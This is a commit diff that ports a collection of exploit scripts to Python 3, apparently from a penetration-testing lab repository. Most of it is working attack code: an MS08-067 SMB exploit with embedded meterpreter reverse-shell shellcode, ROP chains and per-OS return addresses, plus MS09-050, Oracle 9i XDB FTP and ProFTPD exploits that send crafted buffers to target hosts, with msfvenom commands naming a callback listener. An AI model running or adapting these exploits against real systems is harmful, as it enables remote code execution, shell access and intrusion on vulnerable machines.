Merge pull request #1 from mokrunka/master

ankh2054 · web-flow · commit f0853e1b95a2 · 2021-01-26T09:40:09.000Z
update ms09-050.py for Python3
diff --git a/ms08_067.py b/ms08_067.py
@@ -2,76 +2,62 @@
 import time
 import sys
 
-
 from threading import Thread  # Thread is imported incase you would like to modify
 
-
 try:
-
     from impacket import smb
-
     from impacket import uuid
-
     from impacket.dcerpc import dcerpc
-
     from impacket.dcerpc import transport
 
-except ImportError, _:
-
-    print 'Install the following library to make this script work'
-
-    print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
-
-    print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
+except ImportError as _:
 
+    print('Install the following library to make this script work')
+    print('Impacket : http://oss.coresecurity.com/projects/impacket.html')
+    print('PyCrypto : http://www.amk.ca/python/code/crypto.html')
     sys.exit(1)
 
-
-print '#######################################################################'
-
-print '#   MS08-067 Exploit'
-
-print '#   This is a modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/).'
-
-print '#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi'
-
-print '#######################################################################\n'
-
+print('#######################################################################')
+print('#   MS08-067 Exploit')
+print('#   This is a modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/).')
+print(
+    '#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi')
+print('#######################################################################\n')
 
 # Shellcode: Staged Reverse TCP shellcode for meterpreter 
 # Badchars: \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
 # Payload size: 380 bytes + 30 NOPS
 # Make sure you set meterpreter EXITFUNC=thread  - Important!
 # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.47 LPORT=4444EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c
 shellcode = (
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-"\x33\xc9\x83\xe9\xa7\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
-"\x49\x8d\xa8\x90\x83\xee\xfc\xe2\xf4\xb5\x65\x2a\x90\x49\x8d"
-"\xc8\x19\xac\xbc\x68\xf4\xc2\xdd\x98\x1b\x1b\x81\x23\xc2\x5d"
-"\x06\xda\xb8\x46\x3a\xe2\xb6\x78\x72\x04\xac\x28\xf1\xaa\xbc"
-"\x69\x4c\x67\x9d\x48\x4a\x4a\x62\x1b\xda\x23\xc2\x59\x06\xe2"
-"\xac\xc2\xc1\xb9\xe8\xaa\xc5\xa9\x41\x18\x06\xf1\xb0\x48\x5e"
-"\x23\xd9\x51\x6e\x92\xd9\xc2\xb9\x23\x91\x9f\xbc\x57\x3c\x88"
-"\x42\xa5\x91\x8e\xb5\x48\xe5\xbf\x8e\xd5\x68\x72\xf0\x8c\xe5"
-"\xad\xd5\x23\xc8\x6d\x8c\x7b\xf6\xc2\x81\xe3\x1b\x11\x91\xa9"
-"\x43\xc2\x89\x23\x91\x99\x04\xec\xb4\x6d\xd6\xf3\xf1\x10\xd7"
-"\xf9\x6f\xa9\xd2\xf7\xca\xc2\x9f\x43\x1d\x14\xe5\x9b\xa2\x49"
-"\x8d\xc0\xe7\x3a\xbf\xf7\xc4\x21\xc1\xdf\xb6\x4e\x72\x7d\x28"
-"\xd9\x8c\xa8\x90\x60\x49\xfc\xc0\x21\xa4\x28\xfb\x49\x72\x7d"
-"\xfa\x4c\xe5\xa2\x9b\x49\xa2\xc0\x92\x49\x9c\xf4\x19\xaf\xdd"
-"\xf8\xc0\x19\xcd\xf8\xd0\x19\xe5\x42\x9f\x96\x6d\x57\x45\xde"
-"\xe7\xb8\xc6\x1e\xe5\x31\x35\x3d\xec\x57\x45\xcc\x4d\xdc\x9a"
-"\xb6\xc3\xa0\xe5\xa5\x65\xc9\x90\x49\x8d\xc2\x90\x23\x89\xfe"
-"\xc7\x21\x8f\x71\x58\x16\x72\x7d\x13\xb1\x8d\xd6\xa6\xc2\xbb"
-"\xc2\xd0\x21\x8d\xb8\x90\x49\xdb\xc2\x90\x21\xd5\x0c\xc3\xac"
-"\x72\x7d\x03\x1a\xe7\xa8\xc6\x1a\xda\xc0\x92\x90\x45\xf7\x6f"
-"\x9c\x0e\x50\x90\x34\xaf\xf0\xf8\x49\xcd\xa8\x90\x23\x8d\xf8"
-"\xf8\x42\xa2\xa7\xa0\xb6\x58\xff\xf8\x3c\xe3\xe5\xf1\xb6\x58"
-"\xf6\xce\xb6\x81\x8c\x79\x38\x72\x57\x6f\x48\x4e\x81\x56\x3c"
-"\x4a\x6b\x2b\xa9\x90\x82\x9a\x21\x2b\x3d\x2d\xd4\x72\x7d\xac"
-"\x4f\xf1\xa2\x10\xb2\x6d\xdd\x95\xf2\xca\xbb\xe2\x26\xe7\xa8"
-"\xc3\xb6\x58\xa8\x90"
+    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+    "\x33\xc9\x83\xe9\xa7\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
+    "\x49\x8d\xa8\x90\x83\xee\xfc\xe2\xf4\xb5\x65\x2a\x90\x49\x8d"
+    "\xc8\x19\xac\xbc\x68\xf4\xc2\xdd\x98\x1b\x1b\x81\x23\xc2\x5d"
+    "\x06\xda\xb8\x46\x3a\xe2\xb6\x78\x72\x04\xac\x28\xf1\xaa\xbc"
+    "\x69\x4c\x67\x9d\x48\x4a\x4a\x62\x1b\xda\x23\xc2\x59\x06\xe2"
+    "\xac\xc2\xc1\xb9\xe8\xaa\xc5\xa9\x41\x18\x06\xf1\xb0\x48\x5e"
+    "\x23\xd9\x51\x6e\x92\xd9\xc2\xb9\x23\x91\x9f\xbc\x57\x3c\x88"
+    "\x42\xa5\x91\x8e\xb5\x48\xe5\xbf\x8e\xd5\x68\x72\xf0\x8c\xe5"
+    "\xad\xd5\x23\xc8\x6d\x8c\x7b\xf6\xc2\x81\xe3\x1b\x11\x91\xa9"
+    "\x43\xc2\x89\x23\x91\x99\x04\xec\xb4\x6d\xd6\xf3\xf1\x10\xd7"
+    "\xf9\x6f\xa9\xd2\xf7\xca\xc2\x9f\x43\x1d\x14\xe5\x9b\xa2\x49"
+    "\x8d\xc0\xe7\x3a\xbf\xf7\xc4\x21\xc1\xdf\xb6\x4e\x72\x7d\x28"
+    "\xd9\x8c\xa8\x90\x60\x49\xfc\xc0\x21\xa4\x28\xfb\x49\x72\x7d"
+    "\xfa\x4c\xe5\xa2\x9b\x49\xa2\xc0\x92\x49\x9c\xf4\x19\xaf\xdd"
+    "\xf8\xc0\x19\xcd\xf8\xd0\x19\xe5\x42\x9f\x96\x6d\x57\x45\xde"
+    "\xe7\xb8\xc6\x1e\xe5\x31\x35\x3d\xec\x57\x45\xcc\x4d\xdc\x9a"
+    "\xb6\xc3\xa0\xe5\xa5\x65\xc9\x90\x49\x8d\xc2\x90\x23\x89\xfe"
+    "\xc7\x21\x8f\x71\x58\x16\x72\x7d\x13\xb1\x8d\xd6\xa6\xc2\xbb"
+    "\xc2\xd0\x21\x8d\xb8\x90\x49\xdb\xc2\x90\x21\xd5\x0c\xc3\xac"
+    "\x72\x7d\x03\x1a\xe7\xa8\xc6\x1a\xda\xc0\x92\x90\x45\xf7\x6f"
+    "\x9c\x0e\x50\x90\x34\xaf\xf0\xf8\x49\xcd\xa8\x90\x23\x8d\xf8"
+    "\xf8\x42\xa2\xa7\xa0\xb6\x58\xff\xf8\x3c\xe3\xe5\xf1\xb6\x58"
+    "\xf6\xce\xb6\x81\x8c\x79\x38\x72\x57\x6f\x48\x4e\x81\x56\x3c"
+    "\x4a\x6b\x2b\xa9\x90\x82\x9a\x21\x2b\x3d\x2d\xd4\x72\x7d\xac"
+    "\x4f\xf1\xa2\x10\xb2\x6d\xdd\x95\xf2\xca\xbb\xe2\x26\xe7\xa8"
+    "\xc3\xb6\x58\xa8\x90"
 )
 
 # Shellcode2 - Standard Reverse TCP shellcode 
@@ -110,10 +96,10 @@
 )
 
 nonxjmper = "\x08\x04\x02\x00%s" + "A" * 4 + "%s" + \
-    "A" * 42 + "\x90" * 8 + "\xeb\x62" + "A" * 10
+            "A" * 42 + "\x90" * 8 + "\xeb\x62" + "A" * 10
 disableNXjumper = "\x08\x04\x02\x00%s%s%s" + "A" * \
-    28 + "%s" + "\xeb\x02" + "\x90" * 2 + "\xeb\x62"
-ropjumper = "\x00\x08\x01\x00" + "%s" + "\x10\x01\x04\x01";
+                  28 + "%s" + "\xeb\x02" + "\x90" * 2 + "\xeb\x62"
+ropjumper = "\x00\x08\x01\x00" + "%s" + "\x10\x01\x04\x01"
 module_base = 0x6f880000
 
 
@@ -135,7 +121,7 @@ def generate_rop(rvas):
     ret += gadget2[0]
     ret += gadget2[1]
     ret += struct.pack('<L', rvas[
-                       'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret'] + module_base)
+        'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret'] + module_base)
     ret += struct.pack('<L', rvas['pop ecx / ret'] + module_base)
     ret += gadget2[2]
     ret += struct.pack('<L', rvas['mov [eax+0x10], ecx / ret'] + module_base)
@@ -148,117 +134,106 @@ def generate_rop(rvas):
 class SRVSVC_Exploit(Thread):
 
     def __init__(self, target, os, port=445):
-
         super(SRVSVC_Exploit, self).__init__()
-
         self.__port = port
-
         self.target = target
         self.os = os
 
     def __DCEPacket(self):
         if (self.os == '1'):
-            print 'Windows XP SP0/SP1 Universal\n'
+            print('Windows XP SP0/SP1 Universal\n')
             ret = "\x61\x13\x00\x01"
             jumper = nonxjmper % (ret, ret)
         elif (self.os == '2'):
-            print 'Windows 2000 Universal\n'
+            print('Windows 2000 Universal\n')
             ret = "\xb0\x1c\x1f\x00"
             jumper = nonxjmper % (ret, ret)
         elif (self.os == '3'):
-            print 'Windows 2003 SP0 Universal\n'
+            print('Windows 2003 SP0 Universal\n')
             ret = "\x9e\x12\x00\x01"  # 0x01 00 12 9e
             jumper = nonxjmper % (ret, ret)
         elif (self.os == '4'):
-            print 'Windows 2003 SP1 English\n'
+            print('Windows 2003 SP1 English\n')
             ret_dec = "\x8c\x56\x90\x7c"  # 0x7c 90 56 8c dec ESI, ret @SHELL32.DLL
             ret_pop = "\xf4\x7c\xa2\x7c"  # 0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL
             jmp_esp = "\xd3\xfe\x86\x7c"  # 0x 7c 86 fe d3 jmp ESP @NTDLL.DLL
             disable_nx = "\x13\xe4\x83\x7c"  # 0x 7c 83 e4 13 NX disable @NTDLL.DLL
             jumper = disableNXjumper % (
                 ret_dec * 6, ret_pop, disable_nx, jmp_esp * 2)
         elif (self.os == '5'):
-            print 'Windows XP SP3 French (NX)\n'
+            print('Windows XP SP3 French (NX)\n')
             ret = "\x07\xf8\x5b\x59"  # 0x59 5b f8 07
             disable_nx = "\xc2\x17\x5c\x59"  # 0x59 5c 17 c2
             # the nonxjmper also work in this case.
             jumper = nonxjmper % (disable_nx, ret)
         elif (self.os == '6'):
-            print 'Windows XP SP3 English (NX)\n'
+            print('Windows XP SP3 English (NX)\n')
             ret = "\x07\xf8\x88\x6f"  # 0x6f 88 f8 07
             disable_nx = "\xc2\x17\x89\x6f"  # 0x6f 89 17 c2
             # the nonxjmper also work in this case.
             jumper = nonxjmper % (disable_nx, ret)
         elif (self.os == '7'):
-            print 'Windows XP SP3 English (AlwaysOn NX)\n'
-            rvasets = {'call_HeapCreate': 0x21286, 'add eax, ebp / mov ecx, 0x59ffffa8 / ret': 0x2e796, 'pop ecx / ret': 0x2e796 + 6,
-                'mov [eax], ecx / ret': 0xd296, 'jmp eax': 0x19c6f, 'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret': 0x10a56, 'mov [eax+0x10], ecx / ret': 0x10a56 + 6, 'add eax, 8 / ret': 0x29c64}
+            print('Windows XP SP3 English (AlwaysOn NX)\n')
+            rvasets = {'call_HeapCreate': 0x21286, 'add eax, ebp / mov ecx, 0x59ffffa8 / ret': 0x2e796,
+                       'pop ecx / ret': 0x2e796 + 6,
+                       'mov [eax], ecx / ret': 0xd296, 'jmp eax': 0x19c6f,
+                       'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret': 0x10a56,
+                       'mov [eax+0x10], ecx / ret': 0x10a56 + 6, 'add eax, 8 / ret': 0x29c64}
             # the nonxjmper also work in this case.
             jumper = generate_rop(rvasets) + "AB"
         else:
-            print 'Not supported OS version\n'
+            print('Not supported OS version\n')
             sys.exit(-1)
 
-        print '[-]Initiating connection'
+        print('[-]Initiating connection')
 
         self.__trans = transport.DCERPCTransportFactory(
             'ncacn_np:%s[\\pipe\\browser]' % self.target)
 
         self.__trans.connect()
 
-        print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
+        print('[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target)
 
         self.__dce = self.__trans.DCERPC_class(self.__trans)
 
         self.__dce.bind(uuid.uuidtup_to_bin(
             ('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
         # Change shellcode to your required shellcode
         path = "\x5c\x00" + "ABCDEFGHIJ" * 10 + shellcode2 + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + \
-            "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2
+               "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2
 
         server = "\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00"
         prefix = "\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"
 
         self.__stub = server + "\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + \
-            path + "\xE8\x03\x00\x00" + prefix + "\x01\x10\x00\x00\x00\x00\x00\x00"
+                      path + "\xE8\x03\x00\x00" + prefix + "\x01\x10\x00\x00\x00\x00\x00\x00"
 
         return
 
     def run(self):
-
         self.__DCEPacket()
-
         self.__dce.call(0x1f, self.__stub)
         time.sleep(5)
-        print 'Exploit finish\n'
+        print('Exploit finish\n')
 
 
 if __name__ == '__main__':
 
-       try:
-
-           target = sys.argv[1]
-           os = sys.argv[2]
-
-       except IndexError:
-
-                print '\nUsage: %s <target ip>\n' % sys.argv[0]
-                print 'Example: MS08_067.py 192.168.1.1 1 for Windows XP SP0/SP1 Universal\n'
-                print 'Example: MS08_067.py 192.168.1.1 2 for Windows 2000 Universal\n'
-                print 'Example: MS08_067.py 192.168.1.1 3 for Windows 2003 SP0 Universal\n'
-                print 'Example: MS08_067.py 192.168.1.1 4 for Windows 2003 SP1 English\n'
-                print 'Example: MS08_067.py 192.168.1.1 5 for Windows XP SP3 French (NX)\n'
-                print 'Example: MS08_067.py 192.168.1.1 6 for Windows XP SP3 English (NX)\n'
-                print 'Example: MS08_067.py 192.168.1.1 7 for Windows XP SP3 English (AlwaysOn NX)\n'
-                sys.exit(-1)
-
-            
+    try:
+        target = sys.argv[1]
+        os = sys.argv[2]
+
+    except IndexError:
+        print('\nUsage: %s <target ip>\n' % sys.argv[0])
+        print('Example: MS08_067.py 192.168.1.1 1 for Windows XP SP0/SP1 Universal\n')
+        print('Example: MS08_067.py 192.168.1.1 2 for Windows 2000 Universal\n')
+        print('Example: MS08_067.py 192.168.1.1 3 for Windows 2003 SP0 Universal\n')
+        print('Example: MS08_067.py 192.168.1.1 4 for Windows 2003 SP1 English\n')
+        print('Example: MS08_067.py 192.168.1.1 5 for Windows XP SP3 French (NX)\n')
+        print('Example: MS08_067.py 192.168.1.1 6 for Windows XP SP3 English (NX)\n')
+        print('Example: MS08_067.py 192.168.1.1 7 for Windows XP SP3 English (AlwaysOn NX)\n')
+        sys.exit(-1)
 
 current = SRVSVC_Exploit(target, os)
 
 current.start()
-
-
-
-
-
diff --git a/ms09-050.py b/ms09-050.py
@@ -16,8 +16,8 @@
 
 	target = sys.argv[1]
 except IndexError:
-	print '\nUsage: %s <target ip>\n' % sys.argv[0]
-	print 'Example: MS36299.py 192.168.1.1 1\n'
+	print(f'Usage: {sys.argv[0]} <target ip>')
+	print(f'Example: ms09-050.py 192.168.1.1')
 	sys.exit(-1)
 
 #msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.47 LPORT=4447  EXITFUNC=thread  -f c
@@ -132,7 +132,8 @@
 
 s = socket()
 s.connect(host)
-s.send(buff)
+# need to encode as bytes method for use in Python3
+s.sendall(buff.encode('utf-8'))
 s.close() 
 #Trigger the above injected code via authenticated process.
 subprocess.call("echo '1223456' | rpcclient -U Administrator %s"%(target), shell=True)
diff --git a/oracle_9i_xdb_ftp.py b/oracle_9i_xdb_ftp.py
@@ -79,15 +79,17 @@
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
 try:
-	print "\nConnecting..."
+	print( "\nConnecting...")
 	s.connect((rhost,rport))
 	data = s.recv(1024)
-	s.send('USER' + user +'\r\n')
+	user_send = 'USER' + user +'\r\n'
+	s.send(user_send.encode('utf-8'))
 	data = s.recv(1024)
-	s.send('PASS ' + exploit + '\r\n')
-	print "\nDone!"
+	pass_send = 'PASS ' + exploit + '\r\n'
+	s.send(pass_send.encode('utf-8'))
+	print("\nDone!")
 	s.close
 except:
-	print "Could not connect to " + rhost + ":" + str(rport) + "!"
+	print("Could not connect to " + rhost + ":" + str(rport) + "!")
 
 
diff --git a/protfpd_exploit.py b/protfpd_exploit.py
@@ -54,10 +54,10 @@
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
 try:
-	print "Connecting.\n"
+	print("Connecting.\n")
 	s.connect(('10.11.1.146', 21))
-	print "Sending buffer.\n"
-	s.send(buffer)
-	print "Done.\n"
+	print("Sending buffer.\n")
+	s.send(buffer.encode('utf-8'))
+	print("Done.\n")
 except:
-	print "Failed.\n"
+	print("Failed.\n")
